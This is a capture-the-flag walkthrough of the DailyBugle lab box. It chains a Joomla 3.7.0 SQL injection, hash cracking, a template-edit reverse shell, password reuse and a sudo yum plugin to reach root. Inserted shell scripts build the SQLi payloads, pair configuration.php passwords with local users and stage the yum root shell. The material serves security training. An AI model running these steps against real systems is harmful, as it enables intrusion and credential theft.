THM - DailyBugle without Metasploit

Intro
This box looks promising: it features a real-life CMS, Joomla, which is still quite common in the wild. It is even a CMS I used several years ago for one of my blogs!
Let's see if we can get in!
Target
Recon
Quick recon from the room's logo and description:
- Linux;
- Joomla CMS, SQLi;
- Privesc via yum.
Enum
Usual nmap scan:

[screenshot: nmap scan output]
Exploitation
Manually browsing to the website confirms it is a Joomla site. Let's run joomscan to gather more info; we are especially interested in the version, since we are looking for a known SQL injection.
After a few seconds, it turns out our target is running Joomla 3.7.0:
Exploit-DB confirms the SQLi (CVE-2017-8917, in the com_fields component of Joomla 3.7.0), so we can run sqlmap as shown below:

[screenshot: sqlmap output]
While this info is nice to have, extracting what I am looking for through sqlmap looks tedious.
Doing a little more research for an easy win, I came across a Python script that exploits this vuln and directly returns the juicy info (a user and their password hash):
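To see why such a script can pull the hash out so directly, here is an added example (not code from the original post or from the script mentioned above) of the mechanism behind the Joomla 3.7.0 injection. The vulnerable parameter is `list[fullordering]` of `index.php?option=com_fields&view=fields&layout=modal`; the public PoCs inject MySQL's `updatexml()` with an XPath that starts with an invalid character, so the database echoes the selected value back inside an "XPATH syntax error" message. That message only carries 32 characters, which is why a 60-character bcrypt hash has to be read in chunks with `MID()`. The function names, the exact payload shape and the HTML response below are assumptions constructed for this example, and the users table name has to be replaced by the site's real prefixed table.

```shell
#!/bin/sh
# Added example (not the original post's code): error-based extraction as
# used against the Joomla 3.7.0 com_fields SQLi. Nothing here touches a
# network; the "response" is a constructed sample.

# Build the injected expression for one chunk of a subquery's result.
# 0x7e ('~') is an invalid XPath start character, so updatexml() raises
# an error that quotes our data. Payload shape assumed from public PoCs.
sqli_payload() {
    subquery="$1"; offset="$2"; len="$3"
    printf "(updatexml(0,concat(0x7e,mid((%s),%s,%s)),0))\n" "$subquery" "$offset" "$len"
}

# Pull the leaked value out of the HTML error page. The leak shows up as
#   XPATH syntax error: '~<value>'
# and the '~' marker tells us where our data starts.
extract_leak() {
    sed -n "s/.*XPATH syntax error: '~\([^']*\)'.*/\1/p" | head -n 1
}

# Constructed sample response (not a real capture): the first 31-char
# chunk of a fake bcrypt hash, as a vulnerable page would answer it.
SAMPLE_RESPONSE="<b>Error</b>: 1105 XPATH syntax error: '~\$2y\$10\$EXAMPLEsaltEXAMPLEsaltEX'<br />"

main() {
    # First chunk (chars 1-31) of the password column; a second call with
    # offset 32 fetches the rest of a 60-char bcrypt hash. Replace
    # "users" with the site's prefixed table (e.g. <prefix>_users).
    sqli_payload "select password from users where id=1" 1 31
    printf '%s\n' "$SAMPLE_RESPONSE" | extract_leak
}

main "$@"
```

The practical caveat: because each request leaks at most 32 characters, the script issues several requests per value and the web server log on the target shows a burst of requests with `updatexml` in the query string, which is an easy thing to alert on.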
Looking on the internet, the hash returned by the script appears to be bcrypt (hashcat mode 3200), so let's try to crack it with hashcat. Bcrypt is deliberately slow to crack, so a decent wordlist matters more than raw GPU power here:

[screenshot: hashcat run]

After a little while, it worked:
Doing a little more internet research, I found a well-known post-auth technique in Joomla: an administrator can edit a template's PHP files from the backend, which is enough to get a reverse shell…
Getting Initial Shell
Following that technique, I edited a PHP file of an existing template, replacing its content with a PHP reverse shell (the one shipped with Kali / Parrot under /usr/share/webshells/, after setting the IP and port to my listener), saved it, and called the URL: http://$target_ip/templates/beez3/index.php, where beez3 is the template's name and index.php the file I edited.
It got me my foothold:
We are the www-data user, which (un)fortunately means we still need to privesc!
PrivEsc
In order to do so, I downloaded and ran linpeas.sh on the target.
After a little while, it discovered interesting information such as the jjameson user, a password in Joomla's configuration.php, and other things… As always, I was looking for an easy win, and tried to connect via SSH as jjameson with the password I found in configuration.php… and it worked!
I was now in as jjameson, with a real shell, a stable connection and an easy way to come back in!
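Credential reuse between the Joomla database account and a local user is the step that turned the web shell into a proper login here. As an added example (not part of the original write-up), the helper below pulls the database settings out of configuration.php and pairs the password with every local user that has a login shell, which is the candidate list you would feed to `su` or `ssh` next. The function names and the sample configuration.php and passwd files are constructed for this example, not taken from the box.

```shell
#!/bin/sh
# Added example (not the original post's code). Joomla stores its DB
# settings in configuration.php as PHP class properties, e.g.
#   public $user = 'webapp';
#   public $password = 'S3cret';
# and admins frequently reuse that password for a local account.

# Print the value of one `public $name = '...';` property.
joomla_cfg_get() {
    cfg="$1"; key="$2"
    sed -n "s/^[[:space:]]*public \\\$$key = '\([^']*\)';.*/\1/p" "$cfg" | head -n 1
}

# Candidate list: DB password paired with every local user that has a
# real login shell (root included, it is worth a try too).
cred_candidates() {
    cfg="$1"; passwd_file="${2:-/etc/passwd}"
    pw=$(joomla_cfg_get "$cfg" password)
    awk -F: '$7 ~ /\/(ba)?sh$/ {print $1}' "$passwd_file" |
    while read -r u; do printf '%s:%s\n' "$u" "$pw"; done
}

# ---- constructed sample data (not the box's real files) -----------------
TMPD=$(mktemp -d)
cat > "$TMPD/configuration.php" <<'EOF'
<?php
class JConfig {
    public $sitename = 'Example Site';
    public $dbtype = 'mysqli';
    public $host = 'localhost';
    public $user = 'webapp';
    public $password = 'ExamplePassw0rd!';
    public $db = 'joomla';
    public $dbprefix = 'xyz_';
    public $secret = 'NotARealSecret';
}
EOF
cat > "$TMPD/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
jjameson:x:1000:1000::/home/jjameson:/bin/bash
EOF

# Usage: on a real box pass the site's configuration.php and omit the
# second argument to read /etc/passwd.
echo "DB user: $(joomla_cfg_get "$TMPD/configuration.php" user)"
cred_candidates "$TMPD/configuration.php" "$TMPD/passwd"
```

Besides `$password`, the same file holds `$secret` (Joomla's application secret) and, on sites that send mail, an SMTP password; both are worth the same reuse test.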
The first command I issued was sudo -l, in order to see if I could do anything as root. It turned out I was allowed to run yum, which was very promising.
A quick look at GTFObins confirmed another easy win was probably coming. I simply copied/pasted the bits of code (but also analyzed them, to make sure I understood what they did; there is no learning if you blindly copy/paste) and got a root shell:
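For reference, here is the GTFObins plugin route for `sudo yum`, written up as an added example rather than the box's screenshot. yum reads Python plugins from whatever directory the config file passed with `-c` points at, so a user allowed to run `yum` as root can supply a plugin whose `init_hook` replaces the yum process with a shell. The staging function only writes the three files and prints the final command; it does not run sudo. The function name `stage_yum_plugin` and the temp directory are this example's own choices.

```shell
#!/bin/sh
# Added example (not the original post's code): the GTFObins "sudo yum"
# plugin technique. yum loads plugins from pluginpath/pluginconfpath in
# the config given with -c, and a plugin's init_hook runs before any
# package logic, still as root.

stage_yum_plugin() {
    tf="$1"   # staging directory; must be readable by root when yum runs
    # Minimal yum config that enables plugins from our directory.
    cat > "$tf/x" <<EOF
[main]
plugins=1
pluginpath=$tf
pluginconfpath=$tf
EOF
    # Plugin config: plugin "y" is enabled.
    cat > "$tf/y.conf" <<'EOF'
[main]
enabled=1
EOF
    # Plugin body. The yum/yum.plugins imports are what yum's loader
    # expects; init_hook fires on initialisation and exec()s a shell.
    cat > "$tf/y.py" <<'EOF'
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version = '2.1'
def init_hook(conduit):
    os.execl('/bin/sh', '/bin/sh')
EOF
    printf 'sudo yum -c %s/x --enableplugin=y\n' "$tf"
}

# Usage: stage the files, then run the printed command on the target.
TF=$(mktemp -d)
CMD=$(stage_yum_plugin "$TF")
echo "$CMD"
```

Two checks before relying on this: `sudo -l` must list yum without a restricting argument pattern (a rule that pins the command to `yum update`, say, will not accept `-c`), and the staging directory must not be under a home directory that root cannot traverse. The same GTFObins entry also lists an alternative that builds a throwaway RPM with a shell-spawning scriptlet and installs it with `sudo yum localinstall`.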
Outro
I found this box quite "straightforward" and very fun: chaining multiple vulns to get a shell, then a user misconfiguration (password reuse) to pwn a specific user, and finally a sudo rule to become root!
I am pretty sure there are other ways to get root on this box (maybe via the kernel, or sudo directly), but for once, I wanted to go the "intended" way.